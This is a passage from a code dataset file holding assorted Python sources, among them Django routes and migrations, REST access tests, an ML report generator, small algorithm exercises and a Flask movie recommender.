urls.echo_for_sitegroups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 2. Forbidden group\n uid = 115\n groups = [globalgroups.forbidden.value]\n site_groups = {1: [sitegroups.forbidden.value]}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_sitegroups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 3. Access group\n uid = 116\n groups = [globalgroups.privileged.value]\n site_groups = {1: [sitegroups.privileged.value]}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 200\n\n\ndef test_request_access():\n url = urls.base + 'request-and-body'\n req = requests.post(url, data={'z': 1}, headers={'testheader': 'testheader-value'})\n resp = req.json()\n assert 'testheader'.upper() in resp['headers']\n assert resp['body'] == {'z': '1'}\n\n\ndef test_raw_request():\n url = urls.base + 'request-raw-body'\n req = requests.post(url, data={'z': 1}, headers={'testheader': 'testheader-value'})\n resp = req.json()\n assert 'testheader'.upper() in resp['headers']\n","sub_path":"tests/test_rest.py","file_name":"test_rest.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"168923366","text":"\"\"\"\nBooking app urls module\n\"\"\"\nfrom django.urls import path\n\nfrom booking import views\n\nurlpatterns = [\n path('users/', views.CustomUserList.as_view(), name='user-list'),\n path('users//', views.CustomUserDetail.as_view(), name='user-detail'),\n path('halls/', views.HallsList.as_view(), name='hall-list'),\n path('halls//', views.HallsDetail.as_view(), name='hall-detail'),\n path('movies/', views.MoviesListView.as_view(), name='movie-list'),\n path('movies//', views.MoviesDetail.as_view(), name='movie-detail'),\n path('showings/', views.ShowingsListView.as_view(), name='showing-list'),\n path('showings//', views.ShowingsDetail.as_view(), name='showing-detail'),\n path('tickets/', views.TicketsListView.as_view(), name='ticket-list'),\n path('tickets//', views.TicketsDetail.as_view(), name='ticket-detail'),\n path('tickets//pay/', views.PayForTicket.as_view(), name='pay'),\n]\n","sub_path":"booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177214664","text":"# -*- coding: utf-8 -*-\ndebugflag = False #它是True时,所有flag全为True\nimgflag = True #原始图片\nbinaryimgflag = False #这是二值化或者自适应二值化得到的图\nerodimgflag = False #腐蚀得到的图像\ncontoursflag = False #音符边框信息\ncontimgflag = False #把轮廓画在这张图上\nrectimgflag = True #画最小矩形\nsizimgflag = False #标准大小的音符图片\ncoorflag = False #音符左下角坐标\nfigureflag = False #五线谱中线的信息,r和theta\ninfoflag = False #音符的位置和形状信息\nbegincoor = [315,380] #开始信号的标记位","sub_path":"composer/globallist.py","file_name":"globallist.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359854491","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0023_auto_20151026_1304'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='massive_itinerary',\n name='lugar',\n field=models.TextField(help_text=b'Opcionalmente puedes asociar este itinerario a un punto espec\\xc3\\xadfico.', max_length=200, null=True, verbose_name=b'Duraci\\xc3\\xb3n', blank=True),\n ),\n migrations.AlterField(\n model_name='events',\n name='start_time',\n field=models.TimeField(default=datetime.time(14, 55, 26, 754029), help_text=b'Indica la hora de inicio del evento', verbose_name=b'Hora de inicio'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='description',\n field=models.TextField(default='', verbose_name=b'Descripci\\xc3\\xb3n'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='duration',\n field=models.TextField(help_text=b'Cuanto va a durar este punto del itinerario?', max_length=200, null=True, verbose_name=b'Duraci\\xc3\\xb3n', blank=True),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='name',\n field=models.CharField(help_text=b'T\\xc3\\xadtulo de este evento en el itinerario', max_length=100, verbose_name=b'T\\xc3\\xadtulo'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='start_date',\n field=models.DateField(help_text=b'Cuando?', verbose_name=b'Fecha'),\n ),\n migrations.AlterField(\n model_name='massive_itinerary',\n name='start_time',\n field=models.TimeField(help_text=b'A que hora?', null=True, verbose_name=b'Hora', blank=True),\n ),\n migrations.AlterField(\n model_name='my_groups',\n name='color',\n field=models.CharField(default=b'E38A33', max_length=25),\n ),\n ]\n","sub_path":"project/app/migrations/0024_auto_20151026_1455.py","file_name":"0024_auto_20151026_1455.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"339311621","text":"\"\"\"\nModule which contain models training report generator function\n\"\"\"\n\nimport csv\nimport json\nimport os\nimport shutil\nimport uuid\nfrom collections import OrderedDict\n\nimport redis\nfrom pandas import DataFrame\n\nfrom MLLogger import BaseMLLogger\nfrom exception_handler import MLExceptionHandler\nfrom general_helper import (\n get_file_from_blob, get_oauth, fetch_token, get_file_info_from_blob,\n get_multipart_object, post_data_to_blob, logging_exception_message,\n make_directory\n)\nfrom learner.algorithms import CLASSIFIER, REGRESSOR\nfrom learner.plotters import radar_plot\nfrom mass_transit.MTMessageProcessor import PureConsumer, PurePublisher\nfrom mass_transit.mass_transit_constants import (\n GENERATE_REPORT, REPORT_GENERATED, TRAINING_REPORT_GENERATION_FAILED\n)\nfrom messages import (\n training_report_generated_message, training_report_generation_failed\n)\nfrom report_helper.TMP_text import (\n TRAINING_CSV_METRICS, ALL_MODELS_TRAINING_CSV_METRICS\n)\nfrom report_helper.html_render import make_pdf_report\n\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\nTEMP_FOLDER = os.environ['OSDR_TEMP_FILES_FOLDER']\nREDIS_CLIENT = redis.StrictRedis(host='redis', db=0)\nLOGGER = BaseMLLogger(\n log_name='logger', log_file_name='sds-ml-training-reporter')\nOPTIMIZER_FORMATTER = '{:.04f}'.format\n\n\n@MLExceptionHandler(\n logger=LOGGER, fail_publisher=TRAINING_REPORT_GENERATION_FAILED,\n fail_message_constructor=training_report_generation_failed\n)\ndef generate_training_report(body):\n \"\"\"\n Pika callback function used by training report generator.\n Make plots files, general metrics csv file and report file if success.\n\n :param body: RabbitMQ MT message's body\n \"\"\"\n\n oauth = get_oauth()\n fetch_token(oauth)\n\n # define using variables for ml reporter\n model = body['Models'][0]\n model_blob_id = model['blobId']\n file_info = get_file_info_from_blob(oauth, model_blob_id).json()\n if 'ModelInfo' in file_info['metadata'].keys():\n info_key = 'ModelInfo'\n elif 'modelInfo' in file_info['metadata'].keys():\n info_key = 'modelInfo'\n else:\n raise KeyError('No model info')\n model_info = json.loads(file_info['metadata'][info_key])\n body['Bins'] = model_info['Bins']\n model_name = model_info['ModelName']\n model_type = model_info['ModelType']\n base_folder = '{}/general_training_report_{}'.format(\n TEMP_FOLDER, uuid.uuid1())\n make_directory(base_folder)\n LOGGER.info('MODEL INFO: {}'.format(model_info))\n LOGGER.info('MODEL NAME: {}'.format(model_name))\n LOGGER.info('MODEL TYPE: {}'.format(model_type))\n\n # generate general metrics dict\n all_models_metrics = []\n for model in body['Models']:\n # if something wrong with model file from blob storage\n if 'genericFiles' not in model.keys():\n raise TypeError('Empty model\\'s generic files blob ids')\n\n for file_blob_id in model['genericFiles']:\n file_info = get_file_info_from_blob(oauth, file_blob_id).json()\n if 'fileInfo' in file_info['metadata'].keys():\n fileinfo_key = 'fileInfo'\n elif 'FileInfo' in file_info['metadata'].keys():\n fileinfo_key = 'FileInfo'\n else:\n raise KeyError('No fileInfo key in: {}'.format(\n file_info['metadata'].keys()))\n\n file_info = json.loads(file_info['metadata'][fileinfo_key])\n\n if 'fileType' in file_info.keys():\n filetype_key = 'fileType'\n elif 'FileType' in file_info.keys():\n filetype_key = 'FileType'\n else:\n filetype_key = None\n\n if filetype_key and file_info[filetype_key] == TRAINING_CSV_METRICS:\n csv_blob_id = file_blob_id\n csv_model_metrics = get_file_from_blob(\n csv_blob_id, oauth).content\n all_models_metrics.append(csv_model_metrics.decode())\n\n LOGGER.info('CURRENT MODEL INFO: {}'.format(file_info))\n\n LOGGER.info('ALL MODELS METRICS: {}'.format(all_models_metrics))\n # write general metrics data to csv file\n csv_files_names = write_csvs_files(all_models_metrics)\n general_csv_dict = merge_csv_files(csv_files_names)\n rows = make_general_csv_rows(general_csv_dict)\n general_csv_file_path = write_rows_to_csv_file(rows, base_folder)\n metrics = html_metrics_from_dict(general_csv_dict)\n\n fetch_token(oauth)\n # make csv info for blob storage\n general_csv_info = {\n 'FileInfo': json.dumps({\n 'modelName': model_name,\n 'fileType': ALL_MODELS_TRAINING_CSV_METRICS\n }),\n 'SkipOsdrProcessing': 'true'\n }\n # make multipart object prepared to POST to blob storage\n # include csv file and file info\n multipart_general_csv = get_multipart_object(\n body, general_csv_file_path, 'text/csv',\n additional_fields=general_csv_info\n )\n # POST metrcis csv file to blob storage\n post_data_to_blob(oauth, multipart_general_csv)\n\n # create general images\n body['NumberOfGenericFiles'] = 0\n path_to_radar_plot = None\n try:\n if model_type == CLASSIFIER:\n LOGGER.info('Creating radar_plot')\n nbits = body['Bins']\n path_to_radar_plot = radar_plot(\n general_csv_file_path, base_folder, nbits,\n titlename=model_name\n )\n # make radar plot multipart encoded object\n multipart_radar_plot = get_multipart_object(\n body, path_to_radar_plot, 'image/png',\n additional_fields={'correlationId': body['CorrelationId']}\n )\n\n # send, http POST request to blob storage api with radar plot\n post_data_to_blob(oauth, multipart_radar_plot)\n body['NumberOfGenericFiles'] += 1\n except:\n # log error traceback\n logging_exception_message(LOGGER)\n raise Exception('Post generic data exception')\n\n optimizer_metrics = REDIS_CLIENT.get(\n 'optimizer_metrics_{}'.format(body['CorrelationId']))\n\n if optimizer_metrics:\n optimizer_metrics = html_optimal_metrics_from_dict(\n json.loads(optimizer_metrics), model_type)\n\n # add metrics and images to pdf report file\n context = {\n 'metrics': metrics,\n 'radar_plots': [path_to_radar_plot],\n 'optimizer': optimizer_metrics\n }\n pdf_path = make_pdf_report(base_folder, context, model_name='general')\n fetch_token(oauth)\n multipart_general_csv = get_multipart_object(\n body, pdf_path, 'application/pdf',\n additional_fields={'correlationId': body['CorrelationId']}\n )\n post_data_to_blob(oauth, multipart_general_csv)\n body['NumberOfGenericFiles'] += 1\n\n # remove temporary directory\n shutil.rmtree(base_folder, ignore_errors=True)\n\n report_generated = training_report_generated_message(body)\n model_report_generated_message_publisher = PurePublisher(REPORT_GENERATED)\n model_report_generated_message_publisher.publish(report_generated)\n\n LOGGER.info('Report generated!')\n\n return None\n\n\ndef html_optimal_metrics_from_dict(optimal_metrics_dict, model_type):\n \"\"\"\n Method to convert training metrics from dict to html table\n\n :param optimal_metrics_dict: training metrics\n :param model_type: type of model, regression or classification\n :type optimal_metrics_dict: dict\n :type model_type: str\n :return: training metrics as html\n :rtype: str\n \"\"\"\n\n formatted_metrics = TMP_TMP(optimal_metrics_dict, model_type)\n\n # make pandas dataframe from dict\n metrics_as_pandas = DataFrame.from_dict(\n formatted_metrics, orient='index'\n ).sort_index().rename(\n index={'0': 'Descriptors/Fingerprints'}\n )\n\n # convert metrics from OrderedDict to html\n # remove \"bad\" symbols from html metrics\n metrics = metrics_as_pandas.to_html(\n header=False\n ).replace(\n 'th>', 'td>'\n ).replace(\n '', 'td>'\n ).replace(\n 'english')\n user_input = input(\"Please enter in a word or a phrase and I will convert it to english! Rules: Add a space after each letter and then a '//' after each word.\")\n convert_input_to_english(f\"{user_input} //\")\n\n elif which_two.lower() == \"no\":\n print('okay! Next time!')\n \nelif which_one.lower()==\"yes\":\n user_input = input(\"Please enter in a word or a phrase and I will convert it to morse code! Rules: No symbols, besides periods.\")\n convert_input_to_morse(user_input)\nelse: \n print('Okay, maybe you added a weird space. Try again!')\n\n\n\n\n\n","sub_path":"morse.py","file_name":"morse.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624085596","text":"\"\"\"Поиск кратчайшего пути между двумя узлами невзвешенного графа\"\"\"\n\nclass Queue:\n \"\"\"Реализация простой очереди без контроля заполнености\n >>> queue = Queue()\n >>> queue.push(1)\n >>> queue.push(2)\n >>> queue.push(3)\n >>> print(queue.is_empty())\n False\n >>> print(queue.pop())\n 1\n >>> print(queue.pop())\n 2\n >>> print(queue.pop())\n 3\n >>> print(queue.is_empty())\n True\n \"\"\"\n class Element:\n def __init__(self, nxt, value):\n self.nxt = nxt\n self.value = value\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def is_empty(self):\n return self.head is None\n\n def push(self, value):\n if self.is_empty():\n self.tail = self.head = Queue.Element(None, value)\n else:\n self.tail.nxt = Queue.Element(None, value)\n self.tail = self.tail.nxt\n\n def pop(self):\n buf = self.head.value\n self.head = self.head.nxt\n return buf\n\nqueue = Queue()\n\nn, m, x, y = map(int, input().split(\" \"))\n\nG = [[] for i in range(n)]\npath = [-1]*n\nfor i in range(m):\n k, v = map(int, input().split(\" \"))\n G[k].append(v)\n G[v].append(k)\n\ndef find_path(G, x, y, queue, path):\n path[x] = 0\n queue.push(x)\n while not queue.is_empty():\n x = queue.pop()\n for i in G[x]:\n if path[i] == -1:\n path[i] = path[x] + 1\n if i == y:\n return\n queue.push(i)\n\nfind_path(G, x, y, queue, path)\nprint(path[y])\n\n\n\n","sub_path":"47.py","file_name":"47.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497705671","text":"class Solution(object):\n def isAlienSorted(self, words, order):\n \"\"\"\n :type words: List[str]\n :type order: str\n :rtype: bool\n \"\"\"\n orderSet = {}\n for i, c in enumerate(order):\n orderSet[c] = i\n\n for i in range(1, len(words)):\n if self.isLarger(words[i-1], words[i], orderSet):\n return False\n\n return True\n\n def isLarger(self, a, b, orderSet):\n # treat out of bound char as rank/order -1\n for i in range(len(a)):\n oa = orderSet[a[i]]\n ob = orderSet[b[i]] if i < len(b) else -1\n if oa < ob:\n return False\n if oa > ob:\n return True\n return False","sub_path":"src2/verifying-an-alien-dictionary/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211933760","text":"import logging\n\nfrom dancedeets import app\nfrom dancedeets import base_servlet\nfrom dancedeets import fb_api\nfrom dancedeets.mail import mailchimp_api\nfrom dancedeets.util import fb_mapreduce\nfrom dancedeets.users import users\n\n\nclass LookupAppFriendUsers(fb_api.LookupType):\n @classmethod\n def get_lookups(cls, object_id):\n return [('info', cls.url('%s/friends' % object_id))]\n\n\n@app.route('/tasks/track_newuser_friends')\nclass TrackNewUserFriendsHandler(base_servlet.BaseTaskFacebookRequestHandler):\n def get(self):\n key = fb_api.generate_key(LookupAppFriendUsers, self.fb_uid)\n fb_result = self.fbl.fb.fetch_keys([key])\n app_friend_list = fb_result[key]['info']\n logging.info('app_friend_list is %s', app_friend_list)\n user_friends = users.UserFriendsAtSignup.get_or_insert(self.fb_uid)\n user_friends.registered_friend_string_ids = [x['id'] for x in app_friend_list['data']]\n user_friends.put()\n\n post = get\n\n\n@app.route('/tasks/load_users')\nclass LoadUserHandler(base_servlet.UserOperationHandler):\n user_operation = lambda self, fbl, load_users: [load_fb_user(fbl, x) for x in load_users]\n\n\n@app.route('/tasks/reload_all_users')\nclass ReloadAllUsersHandler(base_servlet.BaseTaskFacebookRequestHandler):\n def get(self):\n all_users = self.request.get('all_users', '0') == '1'\n if all_users:\n filters = []\n else:\n filters = [('expired_oauth_token', '=', False)]\n # this calls a map function wrapped by mr_user_wrap, so it works correctly on a per-user basis\n mailchimp_list_id = mailchimp_api.get_list_id()\n fb_mapreduce.start_map(\n fbl=self.fbl,\n name='Load %sUsers' % ('All ' if all_users else ''),\n handler_spec='dancedeets.users.user_tasks.map_load_fb_user',\n entity_kind='dancedeets.users.users.User',\n filters=filters,\n extra_mapper_params={\n 'mailchimp_list_id': mailchimp_list_id,\n },\n queue='fast-queue'\n )\n\n post = get\n\n\ndef yield_load_fb_user(fbl, user):\n if user.expired_oauth_token:\n logging.info('Skipping user %s (%s) due to expired access_token', user.fb_uid, user.full_name)\n user.put()\n elif not fbl.access_token:\n logging.info('Skipping user %s (%s) due to not having an access_token', user.fb_uid, user.full_name)\n user.put()\n else:\n fetch_and_save_fb_user(fbl, user)\n # The above function calls user.put(), so no need for:\n # users.update_mailchimp(user)\n\n\ndef fetch_and_save_fb_user(fbl, user):\n try:\n fb_user = fbl.get(fb_api.LookupUser, user.fb_uid)\n except fb_api.ExpiredOAuthToken as e:\n logging.info('Auth token now expired, mark as such: %s', e)\n user.expired_oauth_token_reason = e.args[0]\n user.expired_oauth_token = True\n user.put()\n return\n else:\n user.compute_derived_properties(fb_user)\n user.put()\n\n\nmap_load_fb_user = fb_mapreduce.mr_user_wrap(yield_load_fb_user)\nload_fb_user = fb_mapreduce.nomr_wrap(yield_load_fb_user)\n","sub_path":"server/dancedeets/users/user_tasks.py","file_name":"user_tasks.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218228097","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport re\nimport argparse\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom operator import itemgetter\nimport matplotlib\n\nmatplotlib.rcParams.update({'font.size': 18})\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ncommandLineParser = argparse.ArgumentParser(description='Compute features from labels.')\n# commandLineParser.add_argument ('INPUT', type=str, choices= ['question_name', 'question_index', 'question_text'], default = 'question_name',\n# help = 'Select input type')\n# commandLineParser.add_argument ('OUTPUT', type=str, choices= ['question_names', 'question_index', 'question_text'], default = 'question_index',\n# help = 'Select output type')\ncommandLineParser.add_argument('sorted_topics', type=str,\n help='Input')\ncommandLineParser.add_argument('key_topics', type=str,\n help='Input')\ncommandLineParser.add_argument('alignment_matrix', type=str,\n help='Input')\ncommandLineParser.add_argument('unigrams', type=str,\n help='Input')\ncommandLineParser.add_argument('auc', type=str, default=None,\n help='Input')\ncommandLineParser.add_argument('--fold', type=str, default=None,\n help='Input')\n\n\ndef main(argv=None):\n args = commandLineParser.parse_args()\n sec_dict = {}\n for section in ['SC', 'SD', 'SE']:\n with open('/home/malinin/dnn_lib/attention_grader/script-maps/scripts-' + section + '-map.txt', 'r') as f:\n for line in f.readlines():\n line = line.replace('\\n', '').split()\n line = ' '.join(line[2:])\n if not sec_dict.has_key(line):\n if section == 'SC':\n sec_dict[line] = 0\n elif section == 'SD':\n sec_dict[line] = 1\n else:\n sec_dict[line] = 2\n\n topic_sec_ids = []\n ids_tuples = []\n topics = []\n with open(args.sorted_topics, 'r') as f:\n for line in f.readlines():\n topics.append(line)\n line = line.replace('\\n', '')\n line = re.sub(r'^.* ', r'', line)\n topic_sec_ids.append(sec_dict[line])\n for topic_sec_id, i in zip(topic_sec_ids, xrange(len(topic_sec_ids))):\n ids_tuples.append((topic_sec_id, i))\n\n with open('topic_ids.txt', 'w') as f:\n for ids in ids_tuples:\n f.write(str(ids[0]) + '\\n')\n\n key_sec_ids = []\n key_tuples = []\n with open(args.key_topics, 'r') as f:\n for line in f.readlines():\n line = line.replace('\\n', '')\n line = re.sub(r'^.* ', r'', line)\n key_sec_ids.append(sec_dict[line])\n for key_sec_id, i in zip(key_sec_ids, xrange(len(key_sec_ids))):\n key_tuples.append((key_sec_id, i))\n\n sorted_ids_tuples = sorted(ids_tuples, key=itemgetter(0, 1))\n sorted_key_tuples = sorted(key_tuples, key=itemgetter(0, 1))\n alignment_matrix = np.loadtxt(args.alignment_matrix)\n plt.matshow(alignment_matrix, cmap=plt.cm.plasma)\n # plt.show()\n plt.close()\n sorted_alignment_matrix = np.zeros_like(alignment_matrix)\n for i, x in zip(sorted_ids_tuples, xrange(len(sorted_ids_tuples))):\n for j, y in zip(sorted_key_tuples, xrange(len(sorted_key_tuples))):\n sorted_alignment_matrix[y][x] = alignment_matrix[j[1]][i[1]]\n plt.matshow(sorted_alignment_matrix, cmap=plt.cm.plasma)\n # plt.show()\n plt.close()\n entropy = np.sum(-alignment_matrix * np.log(alignment_matrix + 1e-8), axis=1)\n _, keys = zip(*sorted(zip(entropy, np.asarray(key_tuples)[:, 1]), key=itemgetter(0)))\n unigrams = np.loadtxt(args.unigrams)\n print\n keys\n with open('new_sorted_topics.txt', 'w') as f:\n for i in keys:\n f.write(topics[i])\n sorted_entropy, _ = zip(*sorted(zip(entropy, np.asarray(key_tuples)[:, 0]), key=itemgetter(1, 0)))\n aucs = np.loadtxt(args.auc)\n\n plt.plot(sorted_entropy, c='b', lw=3.0)\n plt.axvline(x=52, lw=2.0, ls='--', c='k')\n plt.axvline(x=106, lw=2.0, ls='--', c='k')\n plt.text(19, 5, r'SC', fontsize=22)\n plt.text(70, 5, r'SD', fontsize=22)\n plt.text(200, 5, r'SE', fontsize=22)\n plt.xlim(0, 379)\n plt.ylabel('Entropy')\n plt.xlabel('Topics')\n plt.savefig('attention_entropy.png', bbox_inches='tight')\n # plt.show()\n plt.close()\n fig, ax1 = plt.subplots()\n ax2 = ax1.twinx()\n ax1.set_ylabel('Entropy')\n ax1.set_xlabel('Fraction of Topics')\n # plt.ylabel('Entropy')\n # plt.xlim(0,379)\n ax1.plot([i / 379.0 for i in xrange(379)], sorted(entropy, reverse=True), c='r', lw=3.0)\n ax2.set_ylabel('AUC')\n # ax2.set_xlim(0,76)\n # ax1.set_xlim(0,379)\n ax2.plot([i / 76.0 for i in xrange(76)], aucs, c='g', ls='--', lw=3.0)\n ax1.legend(['Entropy'], loc=4)\n ax2.legend(['AUC'], loc=3)\n plt.savefig('attention_entropy_auc.png', bbox_inches='tight')\n # plt.show()\n plt.close()\n\n if args.fold is None:\n plt.savefig('alignment_matrix.png', bbox_inches='tight')\n else:\n plt.savefig('alignment_matrix_fold' + args.fold + '.png', bbox_inches='tight')\n plt.close()\n sys.exit()\n # print alignment_matrix\n confusion = np.zeros((3, 3), dtype=np.float32)\n for key, i in zip(key_sec_ids, xrange(len(key_sec_ids))):\n for topic, j in zip(topic_sec_ids, xrange(len(topic_sec_ids))):\n confusion[key][topic] += alignment_matrix[i][j]\n print(confusion) # , np.sum(confusion,axis=1)\n confusion = confusion / np.sum(confusion, axis=1)[:, np.newaxis]\n print(confusion)\n plt.matshow(confusion, cmap=plt.cm.Blues)\n plt.savefig('confusion_matrix.png', bbox_inches='tight')\n plt.close()\n # plt.show()\n\n return 0\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"preprocessing/extract_section.py","file_name":"extract_section.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"537213670","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot = True)\n\n# Buliding add_layer function\ndef add_Hidden_layer(inputs, in_size, out_size, activation_function=None):\n # add one more layer and return the output of this layer\n Weights = tf.Variable(tf.random_normal([in_size, out_size]))\n #biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n biases = tf.Variable(tf.constant(0.1, shape = [1, out_size]))\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n # dropout\n Wx_plus_b = tf.nn.dropout(Wx_plus_b, keep_prob)\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n \ndef add_output_layer(inputs, in_size, out_size, activation_function=None):\n # add one more layer and return the output of this layer\n Weights = tf.Variable(tf.random_normal([in_size, out_size]))\n #biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n biases = tf.Variable(tf.constant(0.1, shape = [1, out_size]))\n Wx_plus_b = tf.matmul(inputs, Weights) + biases\n if activation_function is None:\n outputs = Wx_plus_b\n else:\n outputs = activation_function(Wx_plus_b)\n return outputs\n# Buliding Accuracy function\ndef compute_accuracy(v_xs, v_ys):\n global output_Layer\n y_pre = sess.run(output_Layer, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pre,1), tf.argmax(v_ys,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob:1})\n return result\n\n# PlaceHolder\nkeep_prob = tf.placeholder(tf.float32)\nxs = tf.placeholder(tf.float32, [None, 784])\nys = tf.placeholder(tf.float32, [None, 10])\n\n# Tensorflow Nerual Network Step\n\n# add_layer(inputs, in_size, out_size, activation_function = None)\n# Step 1 activation function = softmax\n\n## Hidden layer 1\nhidden_Layer1 = add_Hidden_layer(xs, 784, 50, activation_function = tf.nn.sigmoid)\n## Hidden layer 2\nhidden_Layer2 = add_Hidden_layer(hidden_Layer1, 50, 40, activation_function = tf.nn.sigmoid)\n## Add output layer\noutput_Layer = add_output_layer(hidden_Layer2, 40, 10, activation_function = tf.nn.softmax)\n\n# Step 2 loss error method(loss function) = cross entropy\n#cross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(output_Layer),\n# reduction_indices=[1])) \n# Step 3 Gradient Descent\n#train_step = tf.train.GradientDescentOptimizer(0.4).minimize(cross_entropy)\n\n# Step 4 Set session and initializer\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nsaver = tf.train.import_meta_graph('/Github_rep/python_notebook/Tensorflow_notebook/model/DnnModel_test.ckpt.meta')\n#saver = tf.train.Saver()\nsaver.restore(sess, '/Github_rep/python_notebook/Tensorflow_notebook/model/DnnModel_test.ckpt')\nprint('==================')\nprint(compute_accuracy(mnist.test.images, mnist.test.labels))","sub_path":"Tensorflow_notebook/saverTest.py","file_name":"saverTest.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"448639266","text":"from __future__ import print_function\nimport acm, FRTBCreateHierarchyChoiceListCommon\nimport importlib\nimportlib.reload(FRTBCreateHierarchyChoiceListCommon)\n\nael_variables = [['Hierarchy', 'Hierarchy', acm.FHierarchy, FRTBCreateHierarchyChoiceListCommon.ValidHierarchies('Liquidity Horizon'), None, 1, 0, 'The Hierarchy where the choice list data is retreived.']]\n\ndef ael_main(parameters):\n hierarchy = parameters['Hierarchy']\n hierarchyName = hierarchy.Name()\n print ('---------------- Setup of FRTB hierarchy choice lists for \"' + hierarchyName + '\" ----------------')\n\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp())\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp() + ' Creating choice lists')\n choiceListPerTag = {\n 'Risk Class':FRTBCreateHierarchyChoiceListCommon.ChoiceListFromName('FRTB IMA Risk Class'),\n 'Risk Factor Category':FRTBCreateHierarchyChoiceListCommon.ChoiceListFromName('FRTB IMA Category')\n }\n\n hierarchyTree = acm.FHierarchyTree()\n hierarchyTree.Hierarchy = hierarchy\n\n levelColumn = FRTBCreateHierarchyChoiceListCommon.GetLevelColumn(hierarchy)\n\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp())\n print (FRTBCreateHierarchyChoiceListCommon.TimeStamp() + ' Creating choice list values')\n FRTBCreateHierarchyChoiceListCommon.AddChoiceListDataRecursive(hierarchyTree, hierarchyTree.RootNode(), levelColumn, choiceListPerTag)\n\n print ('---------------- Setup of FRTB hierarchy choice lists for \"' + hierarchyName + '\" finished ----------------')\n print ('---------------- Choice lists created for \"' + hierarchyName + '\", restart of client required ----------------')\n print ('')\n","sub_path":"Extensions/FRTB Components/FPythonCode/FRTBCreateIMAHierarchyChoiceLists.py","file_name":"FRTBCreateIMAHierarchyChoiceLists.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"617590257","text":"from flask import Flask,request, url_for, redirect, render_template\r\nimport pickle\r\nimport random\r\nimport pandas as pd\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\napp = Flask(__name__)\r\ndf = pd.read_csv('movie.csv')\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\n\r\ncosine_sim = cosine_similarity(model)\r\ndef find_title_from_index(index):\r\n return df[df.Rank == index][\"Title\"].values[0]\r\ndef find_index_from_title(title):\r\n if len(df[df.Title == title])==0:\r\n return -1\r\n return df[df.Title == title][\"Rank\"].values[0]\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('home.html')\r\n\r\n@app.route('/predict',methods=['POST','GET'])\r\n\r\ndef predict():\r\n movie_name = request.form['query']\r\n movie_index = find_index_from_title(movie_name)\r\n if movie_index==-1:\r\n return render_template('home.html', Your_Movie='{}'.format(\"Oops No Match Found\"))\r\n similar_movies = list(enumerate(cosine_sim[movie_index]))\r\n\r\n\r\n sorted_similar_movies = sorted(similar_movies, key=lambda x: x[1], reverse=True)[1:]\r\n\r\n i = 0\r\n lst=[]\r\n for element in sorted_similar_movies:\r\n lst.append(find_title_from_index(element[0]))\r\n i = i+1\r\n if i>5:\r\n break\r\n\r\n return render_template('home.html', 